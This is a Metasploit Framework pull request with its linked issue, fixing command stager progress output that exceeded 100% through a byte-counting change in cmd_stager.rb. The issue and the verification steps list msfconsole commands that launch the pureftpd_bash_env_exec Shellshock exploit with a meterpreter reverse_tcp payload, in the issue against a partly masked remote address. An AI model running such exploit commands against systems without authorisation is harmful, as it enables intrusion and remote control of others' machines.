### PR TITLE
Modify command stagers to not go over 100%

### LINKED ISSUE #9693: Progress over 100% in command stagers
Hi,

I am trying to run the below exploit by setting all the parameters exactly.

Using exploits like exploit/multi/ftp/pureftpd_bash_env_exec results in showing progress over 100%. Sometimes 100.60% and 100.79% etc.

Steps to reproduce

1.   use exploit/multi/ftp/pureftpd_bash_env_exec
2.   set payload linux/x86/meterpreter/reverse_tcp
3.   set lhost 27.*.*.*
4.   set lport 5555
5.   set rhost 37.60.*.*
6.   exploit

msf exploit(multi/ftp/pureftpd_bash_env_exec) > exploit
[*] Exploit running as background job 1.

[-] Handler failed to bind to 27.5.*.*:5555:-  -
[*] Started reverse TCP handler on 0.0.0.0:5555 
msf exploit(multi/ftp/pureftpd_bash_env_exec) > [*] 37.60.*.*:21 - Command Stager progress -  59.88% done (497/830 bytes)
[*] 37.60.*.*:21 - Command Stager progress - 100.60% done (835/830 bytes)

Expected behavior

Progress should stop at 100%.

Current behavior
No meterpreter shell and progress shows more than 100%.

### Metasploit version
metasploit v4.16.43-dev     

### I installed Metasploit with:
came with the Kali OS. I updated it to latest version

What OS are you running Metasploit on?
Kali Linux 2018

### PR DESCRIPTION
**Pull request by zgoldman-r7**
Fixes #9693

Resolves bug in https://github.com/rapid7/metasploit-framework/issues/9693 where the command stagers for some modules would go over 100%.

## Verification

Start `msfconsole`

```
use exploit/multi/ftp/pureftpd_bash_env_exec
set payload linux/x86/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 5555
set rhost 127.0.0.1
```

in a separate terminal tab: `ncat -k -l 21`

on original tab: `exploit`

before:
```
[*] 127.0.0.1:21 - Command Stager progress -  60.48% done (499/825 bytes)
[*] 127.0.0.1:21 - Command Stager progress - 100.61% done (830/825 bytes)
```

after:
```
[*] Started reverse TCP handler on 127.0.0.1:5555
[*] 127.0.0.1:21 - Command Stager progress -  60.48% done (499/825 bytes)
[*] 127.0.0.1:21 - Command Stager progress - 100.00% done (825/825 bytes)
[*] Exploit completed, but no session was created.
```

note: if exploit is taking a long time, switch to netcat server tab and spam "200 ok" a few times to move it along

### CODE REVIEW

File: lib/msf/core/exploit/cmd_stager.rb [hunk 1]
```diff
@@ -93,14 +93,16 @@ def execute_cmdstager(opts = {})
...
       total_bytes = 0
-      cmd_list.each { |cmd| total_bytes += cmd.length }
+      cmd_list.each { |cmd| total_bytes += cmd.bytesize }
 
       delay = opts[:delay]
       delay ||= 0.25
 
       cmd_list.each do |cmd|
+        # calculate string beforehand length in case exploit mutates string
+        command_length = cmd.bytesize
```
Comment (adfoster-r7) [inline lib/msf/core/exploit/cmd_stager.rb:103]: Context: some of the `execute_command` implementations directly mutate the string with `gsub!` etc - which causes the incorrect string length/byte counting percentage calculation:

https://github.com/rapid7/metasploit-framework/blob/25e8cf8faf56059a6320e0e4df9c78e595f83293/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb#L101-L105

So we opt for counting the bytes before the module implementation intentionally/unintentionally mutates the command out of band

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
After patch:

```
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:5555 
[*] 127.0.0.1:21 - Command Stager progress -  60.48% done (499/825 bytes)
[*] 127.0.0.1:21 - Command Stager progress - 100.00% done (825/825 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > 
```

**Comment by gwillcox-r7** [comment]
# Release Notes
A bug has been fixed whereby command stager progress could go over 100%. This has now been fixed so that command stager progress should never go over 100%.
